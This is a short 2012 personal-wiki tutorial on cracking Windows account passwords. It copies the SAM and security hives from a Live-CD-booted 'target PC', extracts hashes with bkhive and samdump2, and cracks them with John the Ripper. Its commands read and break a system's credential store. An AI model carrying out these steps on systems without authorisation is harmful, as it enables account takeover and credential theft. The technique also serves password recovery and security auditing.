Bkhive, samdump2, john

From Notes_Wiki
Revision as of 04:21, 13 November 2012 by Saurabh (talk | contribs) (Created page with "=Using bkhive, samdump2 and john to crack windows passwords= We can use bkhive, samdump2 and john to crack windows passwords. Weak passwords get cracked within minutes using ...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Using bkhive, samdump2 and john to crack windows passwords

We can use bkhive, samdump2 and john to crack windows passwords. Weak passwords get cracked within minutes using this technique.

  1. Copy 'C:\Windows\system32\config\sam' and 'C:\Windows\system32\config\security'. These files cannot be copied even as administrator when windows is running. Hence you have to boot target PC using Live CD to get these files.
  2. Unzip Bkhive.zip in some folder.
    usage: bkhive systemhive keyfile
    so type command: 'wine Bkhive.exe system keys.txt'
    Note: use Bkreg in place of Bkhive for pre Sp4 systems.
  3. Unzip Samdump2.zip in some folder
  4. Type command 'wine Samdump2.exe SAM keys.txt > hashes.txt'
  5. Now use 'john hashes.txt' to crack the passwords.
  6. To see the cracked passwords later, just type 'john -show hashes.txt' in same folder. There is a john.pot file in the folder making this possible. John also stores some information in ~/.john.

Note: We can start john using 'john --session=imp' and press 'Ctrl+C' to stop john in between. To resume we can use 'john --restore=imp'.

Retrieved from "http://www.sbarjatiya.com/notes_wiki/index.php?title=Bkhive,_samdump2,_john&oldid=442"